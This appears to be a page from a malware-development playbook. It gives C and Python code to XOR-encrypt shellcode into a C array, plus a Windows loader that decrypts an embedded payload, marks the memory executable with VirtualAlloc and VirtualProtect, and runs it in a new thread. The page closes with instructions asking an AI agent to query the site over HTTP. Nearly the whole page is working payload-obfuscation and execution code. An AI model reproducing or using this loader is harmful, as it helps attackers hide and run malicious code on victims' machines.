# XOR Encrypt Shellcode ## XOR encryption C Code to XOR encrypt contents of a file and output in "C" format. ``` #include #include #include #include void XOR(char * data, size_t data_len, char * key, size_t key_len) { int j; j = 0; for (int i = 0; i < data_len; i++) { if (j == key_len - 1) j = 0; data[i] = data[i] ^ key[j]; j++; } } int main(int argc, char **argv) { if(argc < 2) { printf("Format: ./xor.exe filename"); exit(0); } FILE* fp; fp = fopen(argv[1], "r"); if (!fp) { printf("File does not exist\n"); exit(0); } int i =0; // Enter the key for encryption char key[]="SuperSecretKey"; // Seek file pointer to the end and calc file size fseek(fp, 0, SEEK_END); int len = ftell(fp); //Move the file pointer back to the beginning rewind(fp); unsigned char data[len]={}; char ch=0; do { ch = fgetc(fp); data[i]=ch; i++; } while (ch != EOF); //printf("\nCopied data:\n%s\n", data); XOR((char *) data, sizeof data, key, sizeof key); printf("XORed data:\n%s\n", data); //Print in Hex format printf("{"); for(i=0;i0 && i!=sizeof data-1) { printf(", "); } if(i==sizeof data-1) { printf("};"); } } //Decrypting //XOR((char* )data, sizeof data, key, sizeof key); //printf("%s\n", data); fclose(fp); return 0; } ``` Python code to XOR encrypt content of a file and output in "C" format. ``` import sys KEY = "SuperSecretKey" def xor(data, key): key = str(key) l = len(key) output_str = "" for i in range(len(data)): current = data[i] current_key = key[i%len(key)] ordd = lambda x: x if isinstance(x,int) else ord(x) output_str += chr(ordd(current) ^ ord(current_key)) return output_str def printCiphertext(ciphertext): print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') try: plaintext = open(sys.argv[1], "rb").read() except: print("File argument needed! %s " % sys.argv[0]) sys.exit() ciphertext = xor(plaintext, KEY) print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') ``` ## XOR Decryption & Execution ``` #include #include #include #include void XOR(char * data, size_t data_len, char * key, size_t key_len) { int j; j = 0; for (int i = 0; i < data_len; i++) { if (j == key_len - 1) j = 0; data[i] = data[i] ^ key[j]; j++; } } int main(void) { void * exec_mem; BOOL rv; HANDLE th; DWORD oldprotect = 0; unsigned char calc_payload[] = "insert_xor_encrypted_payload_here"; unsigned int calc_len = sizeof(calc_payload); char key[] = "SuperSecretKey"; exec_mem = VirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Decryption XOR((char *) calc_payload, calc_len, key, sizeof(key)); RtlMoveMemory(exec_mem, calc_payload, calc_len); rv = VirtualProtect(exec_mem, calc_len, PAGE_EXECUTE_READ, &oldprotect); // If all good, launch the payload if ( rv != 0 ) { th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); WaitForSingleObject(th, -1); } return 0; } ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/malware-dev/xor-encrypt-shellcode.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.